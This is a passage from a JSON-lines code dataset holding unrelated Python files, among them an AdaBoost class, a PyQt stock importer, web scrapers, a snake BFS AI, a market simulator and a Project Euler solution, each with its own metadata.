\"C:\\\\Users\\\\dudam\\\\PycharmProjects\\\\test1\\\\config\"\n\n def __init__(self, picklename):\n self._filename = os.path.join(self.config_directory, picklename + '.pickle')\n\n if not os.path.isfile(self._filename):\n with open(self._filename, 'wb') as fh:\n pickle.dump(\"a\", fh)\n with open(self._filename, 'rb') as fh:\n pkl = pickle.load(fh)\n self.update(pkl)\n\n # w klasie nadrzednej dict jest tworzona instancja naszego słownika - przez przeczytanie wszystkich linii pliku i dodanie do słownika\n\n def __getitem__(self, key): # motoda dp spr czy wywoływany klucz a dict intnieje w razie takiego wywołania cd['klucz4']\n if not key in self: # spr czy klucz wywoływany istnisje\n raise ConfigKeyError(self, key) # jesli nie istnieje uruchom instancję klasy obsługi wyjątku: ConfigKeyError\n return dict.__getitem__(self, key) # jesli istnieje dokoncz normalnie procedurę __getitem__\n\n\n def __setitem__(self, key, value): #funkcja klasy nadrzednej dict wywoływana przez dodanie elementu do słownika: cd['klucz3']='wartosc3'\n dict.__setitem__(self, key, value)\n with open(self._filename, 'w') as fh:\n pickle.dump(self, fh)\n\n\n\ncd = ConfigDict('config_file')\ncd['klucz3']='wartosc3'\n\nprint(cd)\n","sub_path":"assigment4.py","file_name":"assigment4.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399180845","text":"__author__ = 'KO CE06'\n\n# Create a program that ask for numbers and find the largest in a series of numbers. The program\n# must prompt the user to enter numbers one by one. When user enters 0 or negative number,\n# the program must display the largest non negative\n\nmax = 1\nnumber = 1\nwhile number > 0:\n number = int(input(\"Enter number: \"))\n if(number > max):\n max = number\nprint(max)","sub_path":"LAB205.py","file_name":"LAB205.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85960206","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\nclass BasicAdaboost(object):\n\n #\n def __init__(self, base_estimator=None, n_iteration=100, target=0.001, x_train=np.array([]), y_train=np.array([]), x_test=np.array([]), y_test=np.array([])):\n self.base_estimator = base_estimator ### 基分类器的类型\n self.n_iteration= n_iteration ### 迭代次数等于基分类器的个数\n self.target = target\n # adaboost 弱分类器的权重\n self.beta = []\n # adaboost 的多个弱分类器\n self.estimators = []\n # x_train 和 y_train 是输入的训练集\n self.x_train = x_train\n self.y_train = y_train\n # x_test 和 y_test 是输入的测试集\n self.x_test = x_test\n self.y_test = y_test\n # adaboost 的权重\n self.weights = [1]*len(self.x_train)\n self.bootstrap = range(0, len(self.x_train))\n\n\n\n def train_one_iteration(self,iter):\n clf = self.base_estimator()\n clf.fit(self.x_train[self.bootstrap],self.y_train[self.bootstrap])\n y_train_result = clf.predict(self.x_train[self.bootstrap])\n errors = (self.y_train[self.bootstrap] != y_train_result)\n error = np.sum(self.weights*errors)/len(self.x_train) ##calculate weighted error rate \n if error < 1e-5:\n error = 1e-5 \n self.beta.append((1-error)/error)\n self.weights = [self.weights[index] *0.5 / error if errors[index] else 0.5*weight/(1-error)\n for index,weight in enumerate(self.weights)]\n\n self.weights = [1e-8 if weight < 1e-8 else weight for weight in self.weights]\n self.estimators.append(clf)\n\n # train the data set\n def train(self):\n for i in range(self.n_iteration):\n self.train_one_iteration(i)\n\n #test operation\n def test(self):\n result = []\n for i in range(len(self.x_test)):\n result.append([])\n # 统计不同分类器针对的分类结果\n for index, estimator in enumerate(self.estimators):\n y_test_result = estimator.predict(self.x_test)\n for index2, res in enumerate(result):\n res.append([y_test_result[index2], np.log(1/self.beta[index])])\n #\n final_result = []\n # 投票得出结果 \n for res in result:\n dic = {}\n for r in res:\n if r[0] not in dic: ## 记录每一个分类器对当前test实例的结果\n dic[r[0]] = r[1] \n else:\n dic[r[0]] = dic.get(r[0]) + r[1]\n \n final_result.append(sorted(dic, key=lambda x:dic[x])[-1])\n\n print(float(np.sum(final_result == self.y_test)) / len(self.y_test))\n\n return final_result\n\nfrom utils import loadData\nx_train, x_test, y_train, y_test = loadData()\n\n\n### test for data \nadaboost_estimator = BasicAdaboost(base_estimator=tree.DecisionTreeClassifier, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test)\n\nadaboost_estimator.train()\n\nadaboost_estimator.test()\n","sub_path":"BasicAdaboost.py","file_name":"BasicAdaboost.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"105127148","text":"# coding:utf-8\r\n\r\n\r\nimport xlrd\r\nfrom PyQt4 import QtGui, QtCore\r\n\r\nfrom assetAllocation.stockAllocation.customThreadClass import SomeStockFinanceThread\r\nfrom uiFile import Ui_importStock\r\n\r\n\r\nclass ImportSymbol(QtGui.QDialog, Ui_importStock):\r\n \"\"\"\r\n 将文件中的股票代码导入系统\r\n \"\"\"\r\n\r\n def __init__(self, parent=None):\r\n super(ImportSymbol, self).__init__(parent)\r\n self.parent = parent\r\n self.setupUi(self)\r\n # 导入的股票代码\r\n self.importSymbolList = []\r\n # 导入的文件类型\r\n self.fileType = None\r\n # 初始化一个线程,用于获取股票的财务数据\r\n self.financeThread = SomeStockFinanceThread(self)\r\n self.connect(self.financeThread, QtCore.SIGNAL('started()'), self.financeStartAction)\r\n self.connect(self.financeThread, QtCore.SIGNAL('finished(int, QString)'), self.financeFinishAction)\r\n # 设置样式表\r\n self.filePath.setPlaceholderText(u'股票代码路径')\r\n\r\n self.connect(self.findFile_button, QtCore.SIGNAL('clicked()'),\r\n self.openFileDialog)\r\n self.connect(self.ok_button, QtCore.SIGNAL('clicked()'),\r\n self.importAction)\r\n self.connect(self.cancel_button, QtCore.SIGNAL('clicked()'),\r\n self.cancelAction)\r\n\r\n def openFileDialog(self):\r\n \"\"\"\r\n 打开文件对话框\r\n :return:\r\n \"\"\"\r\n fd = QtGui.QFileDialog(self, QtCore.QString('open file'), '', '')\r\n fd.resize(500, 300)\r\n fd.setFilter(\"Excel(*.xls *.xlsx);;Text(*.txt)\")\r\n fd.setViewMode(QtGui.QFileDialog.List)\r\n\r\n if fd.exec_() == QtGui.QDialog.Accepted:\r\n self.pathName = r'%s' % fd.selectedFiles()[0]\r\n self.filePath.setText(self.pathName)\r\n self.optionConfig(self.pathName)\r\n else:\r\n self.filePath.clear()\r\n\r\n def optionConfig(self, pathName):\r\n \"\"\"\r\n 判断是什么格式,使得另外一种格式无效\r\n :param pathName: 文件的路径和文件名\r\n \"\"\"\r\n importFileType = pathName.split('.')[-1]\r\n if importFileType in ['xls', 'xlsx']:\r\n self.startRow_txt.setEnabled(False)\r\n self.endRow_txt.setEnabled(False)\r\n self.delimiter.setEnabled(False)\r\n self.startRow_xls.setEnabled(True)\r\n self.endRow_xls.setEnabled(True)\r\n self.column.setEnabled(True)\r\n elif importFileType == 'txt':\r\n self.startRow_xls.setEnabled(False)\r\n self.endRow_xls.setEnabled(False)\r\n self.column.setEnabled(False)\r\n self.startRow_txt.setEnabled(True)\r\n self.endRow_txt.setEnabled(True)\r\n self.delimiter.setEnabled(True)\r\n self.fileType = importFileType\r\n\r\n def importAction(self):\r\n \"\"\"\r\n 点击确定后开始导入股票代码\r\n :return:\r\n \"\"\"\r\n if self.fileType in ['xls', 'xlsx']:\r\n startRow = self.startRow_xls.value()\r\n endRow = self.endRow_xls.value()\r\n column = self.column.value()\r\n self.getCodeFromExcel(startRow, endRow, column)\r\n elif self.fileType == 'txt':\r\n startRow = self.startRow_txt.value()\r\n endRow = self.endRow_txt.value()\r\n delimiter = str(self.delimiter.text()) # 有可能因为分隔符的格式出错误\r\n self.getCodeFromText(startRow, endRow, delimiter)\r\n\r\n def getCodeFromExcel(self, startRow, endRow, column):\r\n \"\"\"\r\n 获得导入的代码\r\n :param startRow: 起始行(1开始)\r\n :param endRow: 终止行\r\n :param column: 所在列\r\n :return:\r\n \"\"\"\r\n try:\r\n book = xlrd.open_workbook(self.pathName) # 打开要读的Excel文件\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', u'错误信息为:%s' % str(e))\r\n return False\r\n sheet = book.sheet_by_index(0)\r\n try:\r\n if endRow == 0:\r\n rowList = range(startRow - 1, sheet.nrows)\r\n elif endRow < 0:\r\n rowList = range(startRow - 1, sheet.nrows + endRow)\r\n else:\r\n rowList = range(startRow - 1, endRow)\r\n column -= 1\r\n for row in rowList:\r\n # 读取内容,并过滤\r\n content = str(sheet.row_values(row)[column]).lower()\r\n content = content.replace('sz', '').replace('sh', '').replace('.', '').replace(' ', '')\r\n if content.isdigit() and len(content) == 6:\r\n self.importSymbolList.append(str(content))\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', u'错误信息为:%s' % str(e))\r\n return False\r\n\r\n if not self.importSymbolList:\r\n return\r\n # 股票代码(不一定是有效代码,无效代码不能查到数据)\r\n self.getStockFinanceData(self.importSymbolList)\r\n\r\n def getCodeFromText(self, startRow, endRow, delimiter):\r\n \"\"\"\r\n 从txt文件中读取数据\r\n :param startRow:\r\n :param endRow:\r\n :param delimiter:\r\n :return:\r\n \"\"\"\r\n try:\r\n f = open(self.pathName)\r\n except Exception as e:\r\n QtGui.QMessageBox.warning(self, u'读取错误', u'错误信息为:%s' % str(e))\r\n return False\r\n lines = f.readlines()\r\n f.close()\r\n if endRow == 0:\r\n rowList = lines[startRow - 1:]\r\n else:\r\n rowList = lines[startRow - 1:endRow]\r\n for row in rowList:\r\n for code in row.split(delimiter):\r\n content = code.replace('sz', '').replace('sh', '').replace('.', '').replace(' ', '')\r\n if content.isdigit() and len(content) == 6:\r\n self.importSymbolList.append(str(content))\r\n\r\n if not self.importSymbolList:\r\n return\r\n # 股票代码(不一定是有效代码,无效代码不能查到数据)\r\n self.getStockFinanceData(self.importSymbolList)\r\n\r\n def getStockFinanceData(self, symbolList):\r\n currentIndustryType = self.parent.envContext['currentIndustryType']\r\n if not currentIndustryType:\r\n QtGui.QMessageBox.warning(self, u'查询错误', u'行业信息还未初始化')\r\n return\r\n\r\n tableSymbolList = self.parent.envContext['financeIndexTable'].getTableSymbolList()\r\n symbolList = list(set(symbolList) - set(tableSymbolList))\r\n if not symbolList:\r\n return\r\n ifSelect_check = self.ifSelect_check.isChecked()\r\n addConfigStock_check = self.addConfigStock_check.isChecked()\r\n self.financeThread.startThread(currentIndustryType, symbolList, self.parent.envContext['financeIndexTable'],\r\n toTableObj=self.parent.envContext['regressionTable'],\r\n ifSelect_check=ifSelect_check, addConfigStock_check=addConfigStock_check)\r\n\r\n def financeStartAction(self):\r\n self.ok_button.setEnabled(False)\r\n\r\n def financeFinishAction(self, status, message):\r\n self.ok_button.setEnabled(True)\r\n if status == 201:\r\n self.inputInfo(message)\r\n self.parent.envContext['financeIndexTable'].model.refrushModel()\r\n self.parent.envContext['regressionTable'].model.refrushModel()\r\n else:\r\n QtGui.QMessageBox.warning(self, u'查询错误', u'未找到相关股票代码的财务信息\\n异常代码为%s' % status)\r\n\r\n def inputInfo(self, info):\r\n \"\"\"\r\n 输出命令\r\n :param info:\r\n :return:None\r\n \"\"\"\r\n info = QtCore.QString(info)\r\n self.resultInput.append(info)\r\n\r\n def cancelAction(self):\r\n \"\"\"\r\n 关闭按钮的操作\r\n :return:None\r\n \"\"\"\r\n self.accept()\r\n","sub_path":"assetAllocation/stockAllocation/importSymbol.py","file_name":"importSymbol.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"269470455","text":"# -*- coding: utf-8 -*-\nimport pprint, scrapy\n\nfrom sxsbz.items import SxsbzItem, ContentItem\n\n\nclass Lashu8AllSpider(scrapy.Spider):\n\tname = \"lashu8_all\"\n\tallowed_domains = [\"www.lashu8.com\"]\n\tstart_urls = ['http://www.lashu8.com/']\n\n\tdef parse(self, response):\n\t\ttop_novels = response.xpath(\"\"\"//div[@class=\"m1l\"]/ul/li\"\"\")\n\t\tcategory = \"{}\".format(response.xpath(\"\"\"//div[@class=\"m1l\"]/h2/span/text()\"\"\").extract_first())\n\t\tfor novel in top_novels:\n\t\t\titem = SxsbzItem()\n\t\t\titem['response_url'] = response.url\n\t\t\titem['title'] = novel.xpath(\"\"\"./a\"\"\")[1].xpath(\"\"\"./text()\"\"\").extract_first()\n\t\t\titem['thumbnail_url'] = \"http://{}{}\".format(self.allowed_domains[0], novel.xpath(\"\"\"./a\"\"\")[0].xpath(\"\"\"./img/@src\"\"\").extract_first())\n\t\t\titem['article_url'] = \"http://{}{}\".format(self.allowed_domains[0], novel.xpath(\"\"\"./a\"\"\")[1].xpath(\"\"\"./@href\"\"\").extract_first())\n\t\t\titem['articles'] = [category]\n\t\t\tyield scrapy.Request(item['article_url'], meta={'item': item}, callback=self.parse_article)\n\t\t\t\n\t\t\tbreak\n\t\tyield item\n\n\n\tdef parse_article(self, response):\n\t\titem = response.meta['item']\n\t\tchapters = response.xpath(\"\"\"//div[@class=\"mulu\"]/ul/li\"\"\")\n\t\tchapters_dict = {}\n\t\tfor index, chapter in enumerate(chapters):\n\t\t\tchapter_url = \"http://{}{}\".format(self.allowed_domains[0], chapter.xpath(\"\"\"./a/@href\"\"\").extract_first())\n\t\t\tchapters_dict[str(index)] = ContentItem()\n\t\t\tchapters_dict[str(index)]['chapter'] = [\"
{}\".format(\" \".join(chapter.xpath(\"\"\"./a//text()\"\"\").extract()))]\n\t\t\tchapters_dict[str(index)]['contents'] = []\n\t\t\tyield scrapy.Request(chapter_url, meta={'data': chapters_dict, 'index': str(index)}, callback=self.parse_chapter)\n\t\t\tbreak\n\t\tprint(\"XXXX\", chapters_dict)\n\t\tfor index, key in enumerate(chapters_dict):\n\t\t\tprint(index)\n\t\t\tprint(chapters_dict[str(index)]['chapter'])\n\t\t\tprint(chapters_dict[str(index)]['contents'])\n\t\t\titem['articles'].extend(chapters_dict[str(index)]['chapter'])\n\t\t\titem['articles'].extend(chapters_dict[str(index)]['contents'])\n\n\t\treturn item\n\n\n\tdef parse_chapter(self, response):\n\t\tdata = response.meta['data']\n\t\tindex = response.meta['index']\n\t\tdata[index]['contents'].extend(response.xpath(\"\"\"//div[@class=\"mcc\"]//text()\"\"\").extract())\n\n\t\treturn data","sub_path":"sxsbz/sxsbz/spiders/lashu8_all.py","file_name":"lashu8_all.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"323897264","text":"from game import Model, Direction, Environment\nfrom collections import deque\n\nROUTE_MARK = -3\n\nclass AIBFSModel(Model):\n def __init__(self, logger = None):\n super().__init__(logger)\n self.route = []\n\n def route_compute(self, board, snake_head, food):\n find = False\n queue = deque([snake_head])\n\n parent_map = {}\n\n while queue:\n cur_pos = queue.popleft()\n cx, cy = cur_pos\n\n for i, (dx, dy) in enumerate(Direction.MOVE):\n tx, ty = cx + dx, cy + dy\n tmp_pos = (tx, ty)\n if board[tx, ty] == Environment.FOOD:\n parent_map[food] = (cur_pos, i)\n find = True\n break\n elif board[tx, ty] == Environment.EMPTY:\n board[tx, ty] = ROUTE_MARK\n queue.append(tmp_pos)\n parent_map[tmp_pos] = (cur_pos, i)\n\n if find:\n cur_pos = food\n while cur_pos != snake_head:\n cur_pos, d = parent_map[cur_pos]\n self.route.append(d)\n\n return find\n\n def move(self, board, snake_head, food):\n if self.route:\n return self.route.pop()\n elif self.route_compute(board, snake_head, food):\n return self.route.pop()\n else:\n return Direction.UP\n\n def reset(self):\n pass\n","sub_path":"ai_bfs_model.py","file_name":"ai_bfs_model.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350475019","text":"\"\"\"MC2-P1: Market simulator.\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\nimport os\nfrom util import get_data, plot_data\n\ndef compute_portvals(orders_file = \"./orders/orders.csv\", start_val = 1000000):\n # this is the function the autograder will call to test your code\n df = pd.read_csv(orders_file)\n arr = df.as_matrix() #Store orders in np array\n start_date = arr[0,0]\n end_date = arr[-1,0]\n symbols = f7(arr[:,1])\n prices = get_data(symbols, pd.date_range(start_date, end_date))\n prices = prices[symbols] # remove SPY\n daily_rets = compute_daily_returns(prices)\n\n dates = daily_rets.index.values\n temp = pd.DataFrame(columns=['Value'], index=dates)\n temp.loc[start_date] = pd.Series({'Value': start_val})\n prev_date = start_date\n\n temp = help_function(dates,arr,prices,daily_rets, start_val, temp)\n return temp\n\ndef help_function(dates, arr, prices, daily_rets, start_val, temp):\n for date in dates:\n date = dt.datetime.utcfromtimestamp(date.tolist()/1e9) #convert from datetime64 to datetime\n for row in arr:\n ti = dt.datetime.strptime(row[0], \"%Y-%m-%d\") #convert string to datetime\n if ti < date:\n if row[2] == 'BUY':\n start_val = start_val + daily_rets.ix[date.strftime(\"%Y-%m-%d\"), row[1]] * prices.ix[prev_date, row[1]] * row[3]\n else:\n start_val = start_val - daily_rets.ix[date.strftime(\"%Y-%m-%d\"), row[1]] * prices.ix[prev_date, row[1]] * row[3]\n temp.loc[date] = pd.Series({'Value': int(start_val)})\n prev_date = date\n return temp\n\ndef compute_daily_returns(df):\n \"\"\"Compute and return the daily return values.\"\"\"\n daily_returns = (df / df.shift(1)) -1\n daily_returns.ix[0] = 0 # Note: Returned DataFrame must have the same number of rows\n return daily_returns\n\ndef f7(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\ndef get_portfolio_value(prices, allocs, start_val):\n # Plot adjusted closing prices for the 4 equities\n #plot_data(prices)\n # Normalize the prices according to the first day. The first row for each stock should have a value of 1.0 at this point\n normal_prices = normalize_data(prices)\n # Multiply each column by the allocation to the corresponding equity.\n normal_allocs_prices = normal_prices * allocs\n # Multiply these normalized allocations by starting value of overall portfolio, to get position values\n adj_position_prices = normal_allocs_prices * start_val\n #Sum each row (i.e. all position values for each day). That is your daily portfolio value.\n daily_port_value = adj_position_prices.sum(axis=1)\n return daily_port_value\n\ndef get_portfolio_stats(port_val, daily_rf, samples_per_year):\n daily_rets = compute_daily_returns(port_val)\n daily_rets = daily_rets[1:]\n cr = (port_val[-1] / port_val[0]) - 1\n adr = daily_rets.mean()\n sddr = daily_rets.std()\n sr = 252**(1.0/2) * (adr - daily_rf) / sddr\n return cr, adr, sddr, sr\n\ndef normalize_data(df):\n return df/ df.ix[0,:]\n\ndef test_code():\n of = \"./orders/orders-short.csv\"\n sv = 1000000\n\n # Process orders\n portvals = compute_portvals(orders_file = of, start_val = sv)\n if isinstance(portvals, pd.DataFrame):\n portvals = portvals[portvals.columns[0]] # just get the first column\n else:\n \"warning, code did not return a DataFrame\"\n \n dates = portvals.index.values\n start_date = dt.datetime.utcfromtimestamp(dates[0].tolist()/1e9).strftime(\"%Y-%m-%d\")\n end_date = dt.datetime.utcfromtimestamp(dates[-1].tolist()/1e9).strftime(\"%Y-%m-%d\")\n daily_rf = 0.0\n samples_per_year = 252.0\n cum_ret, avg_daily_ret, std_daily_ret, sharpe_ratio = get_portfolio_stats(portvals, daily_rf, samples_per_year)\n #cum_ret_SPY, avg_daily_ret_SPY, std_daily_ret_SPY, sharpe_ratio_SPY = [0.2,0.01,0.02,1.5]\n\n # Compare portfolio against $SPX\n print (\"Date Range: {} to {}\".format(start_date, end_date))\n print ()\n print (\"Sharpe Ratio of Fund: {}\".format(sharpe_ratio))\n print (\"Cumulative Return of Fund: {}\".format(cum_ret))\n print (\"Standard Deviation of Fund: {}\".format(std_daily_ret))\n print (\"Average Daily Return of Fund: {}\".format(avg_daily_ret))\n print (\"Final Portfolio Value: {}\".format(portvals[-1]))\n\nif __name__ == \"__main__\":\n test_code()\n","sub_path":"mc2_p1/marketsim.py","file_name":"marketsim.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60003747","text":"# coding:utf-8\r\n\r\n__author__ = 'ChenKai'\r\n\r\nfrom feedgen.feed import FeedGenerator\r\n\r\nfrom project.models import Post\r\nfrom project import db\r\nimport os\r\nimport pytz\r\nfrom datetime import datetime\r\nimport time\r\n\r\nfilename = 'project/static/rss/atom.xml'\r\n\r\n\r\ndef CDATA(str):\r\n return '' % str\r\n\r\n\r\n# 生成atom.xml 用于Rss\r\ndef genAtom(filename):\r\n\r\n if os.path.exists(filename):\r\n os.remove(filename)\r\n\r\n fg = FeedGenerator()\r\n fg.title(\"BONFY\")\r\n fg.link(href='/atom.xml', rel='self')\r\n fg.link(href='http://www.bonfy.im/')\r\n\r\n fg.id('http://www.bonfy.im/')\r\n fg.author({\r\n 'name': 'BONFY',\r\n 'email': 'bonfygithub@163.com'\r\n })\r\n\r\n posts = Post.query.order_by('id desc').limit(10)\r\n\r\n for post in posts:\r\n fe = fg.add_entry()\r\n fe.title(post.title)\r\n fe.link(href='www.bonfy.im/blog/detail/%d' % int(post.id), rel='self')\r\n\r\n local = pytz.timezone(\"Asia/Shanghai\")\r\n local_dt = local.localize(post.insert_dt, is_dst=None)\r\n utc_dt = local_dt.astimezone(pytz.utc)\r\n\r\n fe.published(utc_dt)\r\n fe.id(post.title)\r\n fe.content(post.content_html, type='html')\r\n\r\n fg.atom_file(filename)\r\n\r\n\r\n# 将Hexo的.md file 转存进数据库\r\n# 需要将所有的.md file 放进 static/md 文件夹中\r\ndef initMd(filePath):\r\n for file_name in os.listdir(filePath):\r\n with open(os.path.join(filePath, file_name), 'r') as f:\r\n lines = f.readlines()\r\n\r\n title = str(lines[0]).strip()[len('title: '):]\r\n user_id = 1\r\n insert_date = datetime.strptime(str(lines[1]).strip()[len('date: '):].replace('/', '-'), \"%Y-%m-%d %H:%M:%S\")\r\n # tag_id = 1 # tag_id 默认为1 随便说说\r\n content = ''.join(lines[3:])\r\n\r\n new_message = Post(\r\n title,\r\n content,\r\n user_id,\r\n insert_dt=insert_date\r\n )\r\n db.session.add(new_message)\r\n db.session.commit()\r\n\r\n\r\nif __name__ == '__main__':\r\n # genAtom()\r\n initMd('project/static/md')","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"613430887","text":"\"\"\"Project Euler Problem 55\"\"\"\n\n\ndef problem_55() -> int:\n \"\"\"Lychrel numbers\"\"\"\n lychrel_number_list = list()\n for i in range(1, 10000):\n tmp_num = i\n loop_cnt = 1\n while loop_cnt < 50:\n tmp_num = get_sum_reverse_number(tmp_num)\n if judge_palindrome_number(tmp_num):\n break\n loop_cnt += 1\n if loop_cnt == 50:\n lychrel_number_list.append(i)\n return len(lychrel_number_list)\n\n\ndef get_sum_reverse_number(num: int) -> int:\n \"\"\"return {num} + reverse {num}\"\"\"\n return num + int(str(num)[::-1])\n\n\ndef judge_palindrome_number(num: int) -> bool:\n \"\"\"return True(equal palindrome) or False(not palindrome)\"\"\"\n return str(num) == str(num)[::-1]\n\n\nif __name__ == \"__main__\":\n print(problem_55())\n","sub_path":"sampleproject/www/Project_Euler/problem051_100/problem055.py","file_name":"problem055.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"618543993","text":"# coding=utf-8\n\nimport HTMLParser\nimport requests\nimport time\n\ndef download(URL):\n headers = {}\n headers['User-Agent'] = 'Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\n headers['Accept-Language'] = 'en-US,en;q=0.5'\n #headers['Accept-Encoding'] = 'gzip, deflate'\n headers['DNT'] = '1'\n #headers['Connection'] = 'keep-alive'\n headers['Cache-Control'] = 'max-age=0'\n\n h = HTMLParser.HTMLParser()\n URL = h.unescape(URL)\n\n try:\n r = requests.get(URL, headers=headers)\n time.sleep(5)\n if r.status_code == 200:\n return r.content\n except:\n time.sleep(5)\n return('Error')\n","sub_path":"downloadPage.py","file_name":"downloadPage.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"391661016","text":"#!/usr/bin/env python\n__author__ = 'Jing Conan Wang, Boston University, wangjing@bu.edu'\n\nfrom librl.policies import BoltzmanPolicy, PolicyFeatureModule\nfrom librlmod.environments.maze.endlessmaze import EndlessMazeBinaryAction\nfrom librlmod.environments.endlessGridWorld import EndlessGridWorld\nfrom librlmod.experiments import *\nfrom librl.learners import *\nfrom librl.agents.actorcriticagent import ActorCriticAgent\nfrom librlmod.graph.GirdWorldDisplay import gridWorldWindows\n\n# import global parameters\nfrom problem_settings import gridSize, unsafeStates, iniState, goalStates, TP, DF, senRange, rewards\nfrom problem_settings import iniTheta, T\n\n# Create environment\n# Add unsafe states\nenvMatrix = zeros(gridSize)\nenvMatrix[zip(*goalStates)] = EndlessMazeBinaryAction.SOURCE_FLAG\nenv = EndlessMazeBinaryAction(envMatrix, iniState)\n\n# Create task\ntask = EndlessGridWorld(env, senRange, rewards)\n\n\nsessionNumber = 1000\nsessionSize = 100\n\nfeaDim = 13\nnumActions = 2\n\npolicy = BoltzmanPolicy(numActions, T, iniTheta)\nmodule = PolicyFeatureModule(policy, 'policywrapper')\nlearner = HessianLSTDLearner(hessianlearningrate=1,\n module=module,\n cssinitial=0.1,\n cssdecay=1000,\n assinitial=0.01,\n assdecay=1000, # ass means actor steps size\n rdecay=0.95,\n maxcriticnorm=10000, # maximum critic norm\n tracestepsize=0.9, # stepsize of trace\n parambound = None\n )\n\nlearner.minHessianSampleNumber = 10\nlearner.actorUpdateThreshold = 10\nagent = ActorCriticAgent(learner, sdim=feaDim*numActions, adim=1, batch=True)\nexperiment = GraphSessionExperiment(task, agent, policy=policy, batch=True)\n\nGridWorld=gridWorldWindows(gridSize[0],gridSize[1],UnitSize=50,grid=rewards)\n\ntry:\n experiment.doSessionsAndPrint(sessionNumber=sessionNumber,\n sessionSize=sessionSize,\n GraphUnit=GridWorld)\nexcept KeyboardInterrupt:\n pass\n","sub_path":"examples/endlessmaze/hessionexample.py","file_name":"hessionexample.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"384334074","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nglobal link_flag\nlink_flag = ''\ndef getLink(url, page):\n global link_flag\n res = requests.get(url)\n soup = bs(res.content, \"html5lib\")\n products = soup.findAll('div', attrs={'class': 'listInner'})\n if len(products) == 0:\n return 0\n if page == 1:\n link_flag = products[0].find('a').get('href')\n\n with open('links.txt', 'a+') as f:\n for product in products:\n link = product.find('a').get('href')\n if page != 1 and link == link_flag:\n return 0\n f.write('http://zozo.jp' + link)\n f.write('\\n')\n return 1\n\ndef getFirstLinks(url):\n first_links = []\n res = requests.get(url)\n soup = bs(res.content, \"html5lib\")\n parts = soup.findAll('dl', attrs={'class': 'textListBlock clearfix'})\n for part in parts:\n links = part.findAll('a')\n for link in links:\n first_links.append('http://zozo.jp' + link['href'])\n return first_links\n\nif __name__ == '__main__':\n url = 'http://zozo.jp/brand/default.html?c=SwitchType&ts=0'\n first_links = getFirstLinks(url)\n for first_link in first_links:\n page = 1\n flag = 1\n while flag != 0:\n url = first_link + '?pno=' + str(page)\n try_time = 3\n while try_time != 0:\n try:\n flag = getLink(url, page)\n try_time = 0\n except:\n try_time -= 1\n page += 1\n print(url)\n","sub_path":"zozo_jp/getLinks.py","file_name":"getLinks.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"468669344","text":"'''\nGets the number of days until Texas's next scheduled execution\n'''\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nclass Offender_info():\n scheduled_execution = \"\"\n time_to_scheduled_execution = \"\"\n last_name = \"\"\n first_name = \"\"\n TDCJ_number = \"\"\n date_of_birth = \"\"\n race = \"\"\n date_received = \"\"\n county = \"\"\n link_to_detailed_info = \"\"\n\n def __str__(self):\n return (\"Last name: {}\".format(self.last_name)+ \"\\n\" +\n \"First name: {}\".format(self.first_name)+ \"\\n\" +\n \"Scheduled execution: {}\".format(self.scheduled_execution)+ \"\\n\" +\n \"Time to scheduled execution: {}\".format(self.time_to_scheduled_execution) + \"\\n\" +\n \"TDCJ_number: {}\".format(self.TDCJ_number)+ \"\\n\" +\n \"Date of birth: {}\".format(self.date_of_birth)+ \"\\n\" +\n \"Race: {}\".format(self.race)+ \"\\n\" +\n \"Date received: {}\".format(self.date_received)+ \"\\n\" +\n \"County: {}\".format(self.county) +\"\\n\" + \n \"Link to more detailed info: {}\".format(self.link_to_detailed_info) + \"\\n\")\n\n\ndef get_scheduled_executions_info(url):\n\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n\n results = soup.find_all('table', attrs={'class' : 'tdcj_table indent'})[0].find_all('td')\n scheduled_executions_info = [] # stores all scheduled executions info\n\n for i in range(7): # slicing every 9 elements for 7 offenders; still in html format\n scheduled_executions_info.append(results[i*9:(i*9)+9])\n\n for info_in_td in scheduled_executions_info: # replacing each element into appropriate text and link\n for index, info in enumerate(info_in_td):\n if(index is 1):\n info_in_td[index] = \"https://www.tdcj.state.tx.us/death_row/\" + (info_in_td[index].find_all('a', href = True)[0]['href'])\n else:\n info_in_td[index] = 